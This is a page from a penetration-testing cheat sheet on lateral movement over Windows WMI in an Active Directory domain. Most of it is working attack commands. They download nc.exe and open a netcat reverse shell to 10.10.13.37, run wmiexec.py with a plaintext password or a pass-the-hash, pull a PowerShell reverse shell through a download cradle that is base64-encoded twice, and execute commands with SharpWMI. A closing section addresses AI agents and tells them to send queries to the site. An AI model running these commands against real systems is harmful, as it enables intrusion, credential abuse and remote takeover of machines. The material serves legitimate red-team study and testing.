# WMI
*
*
Perform ICMP checks remotely using `Win32_PingStatus` and [wmiquery.py](https://github.com/fortra/impacket/blob/master/examples/wmiquery.py):
```
$ cat ping.wmi
SELECT StatusCode, ResponseTime FROM Win32_PingStatus WHERE Address='1.1'
$ wmiquery.py -k -no-pass SRV01.megacorp.local -file ping.wmi | grep '^ |' -A1
```
## PowerShell
Basic command to check if we have privileges to execute WMI:
```
PS > Get-WmiObject -Credential $cred -ComputerName PC01 -Namespace "root" -class "__Namespace" | Select Name
```
Execute commands:
```
PS > Invoke-WmiMethod -Credential $cred -ComputerName PC01 win32_process -Name Create -ArgumentList ("powershell (New-Object Net.WebClient).DownloadFile('http://10.10.13.37/nc.exe', 'C:\Users\bob\music\nc.exe')")
PS > Invoke-WmiMethod -Credential $cred -ComputerName PC01 win32_process -Name Create -ArgumentList ("C:\Users\bob\music\nc.exe 10.10.13.37 1337 -e powershell")
```
### WMI Enumeration
*
*
*
*
{% code title="Invoke-LocalWMIEnum.ps1" %}
```powershell
Get-WmiObject -Class Win32_ComputerSystem | select BootupState,UserName,TotalPhysicalMemory,SystemType,SystemFamily,Domain,DNSHostName,OEMStringArray | ft -AutoSize
Get-WmiObject -Class Win32_OperatingSystem | fl *
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | select PSComputerName,DisplayName,PathToSignedProductExe,PathToSignedReportingExe,ProductState,Timestamp | ft -AutoSize
Get-WmiObject Win32_Service | select Name,State,StartName,PathName | ? {$_.State -like "Running"} | findstr /vi "C:\Windows" | ft -AutoSize
Get-WmiObject -Class Win32_LoggedOnUser | select Antecedent,Dependent,PSComputerName | ft -AutoSize
Get-WmiObject -Class Win32_LogonSession | select AuthenticationPackage,LogonID,StartTime,Scope | ft -AutoSize
Get-WmiObject -Class Win32_QuickFixEngineering | select PSComputerName,Description,HotFixID,InstalledBy,InstalledOn | ft -AutoSize
Get-WmiObject -Class Win32_Share | select Type,Name,AllowMaximum,Description,Scope | ft -AutoSize
Get-WmiObject -Class Win32_IP4RouteTable | select PSComputerName,Caption,Mask,Metric1,Protocol | ft -AutoSize
Get-WmiObject -Class Win32_UserAccount | ft -AutoSize
Get-WmiObject -Class Win32_Group | ft -AutoSize
```
{% endcode %}
## MSFT\_MTProcess
*
*
*
## Tools
### wmiexec.py
*
*
*
```
$ wmiexec.py -codec cp866 snovvcrash:'Passw0rd!'@192.168.1.11
$ wmiexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 snovvcrash@192.168.1.11
```
Get a PowerShell reverse-shell:
```
$ sudo python3 -m http.server 80
$ sudo rlwrap nc -lvnp 443
$ wmiexec.py -silentcommand -nooutput snovvcrash:'Passw0rd!'@192.168.1.11 'powershell iEx (iWr "http://10.10.13.37/rev.ps1")'
```
When loading the cradle from a semi-interactive shell, you can combine with `Invoke-WmiMethod` to spawn a new PowerShell process:
```bash
wmiexec.py -silentcommand -nooutput snovvcrash:'Passw0rd!'@192.168.1.11 "powershell -enc $(echo -n 'Invoke-WmiMethod Win32_Process -Name Create -ArgumentList ("powershell -enc '`echo -n 'IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/rev.ps1")' | iconv -t UTF-16LE | base64 -w0`'")' | iconv -t UTF-16LE | base64 -w0)"
```
### SharpWMI
*
```
PS > .\SharpWMI.exe action=exec [username=MEGACORP\snovvcrash] [passw0rd=Passw0rd!] computername=PC01 command="powershell -enc "
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/wmi.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.